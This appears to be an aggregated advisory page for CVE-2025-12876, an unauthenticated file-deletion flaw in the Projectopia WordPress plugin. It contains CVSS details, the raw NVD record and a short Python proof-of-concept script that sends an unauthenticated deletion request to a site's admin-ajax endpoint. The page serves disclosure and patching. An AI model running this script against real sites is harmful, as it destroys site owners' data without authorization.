Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-12876 CVSS 5.3 MEDIUM

CVE-2025-12876

Published: 2025-12-05 10:15:46
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Projectopia – WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pto_delete_file AJAX action in all versions up to, and including, 5.1.19. This makes it possible for unauthenticated attackers to delete arbitrary attachments.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Projectopia Core plugin < 5.1.20
Projectopia Core plugin <= 5.1.19 (all versions up to)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12876 PoC - Unauthenticated File Deletion # Target: Projectopia WordPress Plugin < 5.1.20 # Action: pto_delete_file AJAX endpoint def delete_file(target_url, file_id): """ Delete arbitrary file via unprotected AJAX action Args: target_url: WordPress site URL file_id: Attachment ID to delete """ endpoint = f"{target_url}/wp-admin/admin-ajax.php" data = { 'action': 'pto_delete_file', 'file_id': file_id, 'security': '' # No nonce validation } try: response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request sent for file_id: {file_id}") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <file_id>") print(f"Example: python {sys.argv[0]} http://example.com 123") sys.exit(1) target = sys.argv[1] file_id = sys.argv[2] delete_file(target, file_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12876", "sourceIdentifier": "[email protected]", "published": "2025-12-05T10:15:46.370", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Projectopia – WordPress Project Management plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pto_delete_file AJAX action in all versions up to, and including, 5.1.19. This makes it possible for unauthenticated attackers to delete arbitrary attachments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/projectopia-core/trunk/includes/functions/general/general_functions.php#L389", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3417635/projectopia-core/trunk/includes/functions/general/general_functions.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/940c6a27-05a2-4eca-89ee-b483f88b9524?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.